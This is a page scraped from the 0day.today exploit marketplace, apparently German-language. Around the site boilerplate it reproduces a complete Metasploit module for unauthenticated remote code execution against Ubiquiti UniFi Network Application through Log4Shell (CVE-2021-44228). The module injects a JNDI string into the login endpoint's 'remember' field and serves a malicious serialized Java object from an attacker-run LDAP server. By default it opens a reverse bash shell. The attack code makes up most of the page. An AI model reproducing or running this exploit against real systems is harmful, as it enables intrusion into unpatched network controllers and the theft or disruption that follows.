0day.today - Größte Exploit-Datenbank der Welt.
![](/img/logo_green.jpg)
Wir benutzen eine Hauptdomain DOMAIN_LINK
Wenn Du den Exploit kaufen, oder für einen Service bezahlen möchtest, musst Du Gold kaufen. Wir wollen nicht, dass Du unsere Seite als ein Werkzeug für Aktivitäten wie Hacking verwendest. Illegale Aktionen, die andere Benutzer oder Webseiten betreffen, für die Du keine Zugriffsrechte hast, führen dazu, dass der Account gebannt und alle Daten von diesem unwiderruflich gelöscht werden.
Die Administratoren dieser Seite benutzen nur die offiziellen Kontaktdaten. Achte auf Betrüger!
![We DO NOT use Telegram or any messengers / social networks!](/img/no_telegram_big.png)
Please, beware of scammers!
- Lies [ Vereinbarung ]
- Lies [ Senden ] Regeln
- Besuche [ FAQ ] page
- [ Registrieren ] Profil
- Bekommen [ GOLD ]
- Wenn Du möchtest [ Verkaufen ]
- Wenn Du möchtest [ Kaufen ]
- Wenn Du vergessen hast [ Account ]
- Fragen [ [email protected] ]
- Anmeldungsseite
- Registrierungsseite
- Seite für Accountwiederherstellung
- FAQ Seite
- Kontakt
- Regeln für Veröffentlichungen
- Vereinbarungsseite
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
UniFi Network Application Unauthenticated Log4Shell Remote Code Execution Exploit
Autor
Risiko
![](/img/risk/critlow_4.gif)
Security Risk Critical
]0day-ID
Kategorie
Datum hinzufügen
CVE
Betriebssystem
## # This module requires Metasploit: https://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::JndiInjection include Msf::Exploit::Remote::HttpClient prepend Msf::Exploit::Remote::AutoCheck def initialize(_info = {}) super( 'Name' => 'UniFi Network Application Unauthenticated JNDI Injection RCE (via Log4Shell)', 'Description' => %q{ The Ubiquiti UniFi Network Application versions 5.13.29 through 6.5.53 are affected by the Log4Shell vulnerability whereby a JNDI string can be sent to the server via the 'remember' field of a POST request to the /api/login endpoint that will cause the server to connect to the attacker and deserialize a malicious Java object. This results in OS command execution in the context of the server application. This module will start an LDAP server that the target will need to connect to. }, 'Author' => [ 'Spencer McIntyre', # this exploit module and JNDI/LDAP lib stuff 'RageLtMan <rageltman[at]sempervictus>', # JNDI/LDAP lib stuff 'Nicholas Anastasi' # Unifi research ], 'References' => [ [ 'CVE', '2021-44228' ], [ 'URL', 'https://www.sprocketsecurity.com/blog/another-log4j-on-the-fire-unifi' ], [ 'URL', 'https://github.com/puzzlepeaches/Log4jUnifi' ], [ 'URL', 'https://community.ui.com/releases/UniFi-Network-Application-6-5-54/d717f241-48bb-4979-8b10-99db36ddabe1' ] ], 'DisclosureDate' => '2021-12-09', 'License' => MSF_LICENSE, 'DefaultOptions' => { 'RPORT' => 8443, 'SSL' => true, 'WfsDelay' => 30 }, 'DefaultTarget' => 1, 'Targets' => [ [ 'Windows', { 'Platform' => 'win' }, ], [ 'Unix', { 'Platform' => 'unix', 'Arch' => [ARCH_CMD], 'DefaultOptions' => { 'PAYLOAD' => 'cmd/unix/reverse_bash' } }, ] ], 'Notes' => { 'Stability' => [CRASH_SAFE], 'SideEffects' => [IOC_IN_LOGS], 'AKA' => ['Log4Shell', 'LogJam'], 'Reliability' => [REPEATABLE_SESSION] } ) register_options([ OptString.new('TARGETURI', [ true, 'Base path', '/']) ]) end def wait_until(&block) datastore['WfsDelay'].times do break if block.call sleep(1) end end def check validate_configuration! res = send_request_cgi('uri' => normalize_uri(target_uri, 'status')) return Exploit::CheckCode::Unknown('No HTTP response was received.') if res.nil? server_version = res.get_json_document.dig('meta', 'server_version') return Exploit::CheckCode::Safe('The target service does not appear to be running.') unless server_version =~ /(\d+\.)+/ vprint_status("Detected version: #{server_version}") server_version = Rex::Version.new(server_version) if server_version < Rex::Version.new('5.13.29') return Exploit::CheckCode::Safe('Versions prior to 5.13.29 are not exploitable.') elsif server_version > Rex::Version.new('6.5.53') return Exploit::CheckCode::Safe('Versions after 6.5.53 are patched and not affected.') end vprint_status('The target appears to be a vulnerable version, attempting to trigger the vulnerability...') start_service res = trigger return Exploit::CheckCode::Unknown('No HTTP response was received.') if res.nil? wait_until { @search_received } @search_received ? Exploit::CheckCode::Vulnerable : Exploit::CheckCode::Unknown('No LDAP search query was received.') ensure stop_service end def build_ldap_search_response_payload return [] if @search_received @search_received = true return [] unless @exploiting print_good('Delivering the serialized Java object to execute the payload...') build_ldap_search_response_payload_inline('BeanFactory') end def trigger @search_received = false # HTTP request initiator send_request_cgi( 'uri' => normalize_uri(target_uri, 'api', 'login'), 'method' => 'POST', 'ctype' => 'application/json', 'data' => { 'username' => rand_text_alphanumeric(8..16), # can not be blank!, 'password' => rand_text_alphanumeric(8..16), # can not be blank! 'remember' => jndi_string, 'strict' => true }.to_json ) end def exploit validate_configuration! @exploiting = true start_service res = trigger fail_with(Failure::Unreachable, 'Failed to trigger the vulnerability') if res.nil? msg = res.get_json_document.dig('meta', 'msg') if res.code == 400 && msg == 'api.err.Invalid' # returned by versions before 5.13.29 fail_with(Failure::NotVulnerable, 'The target is not vulnerable') end unless res.code == 400 && msg == 'api.err.InvalidPayload' # returned by versions after 5.13.29 (including patched ones) fail_with(Failure::UnexpectedReply, 'The server replied to the trigger in an unexpected way') end wait_until { @search_received && (!handler_enabled? || session_created?) } handler ensure cleanup end end # 0day.today [2024-07-01] #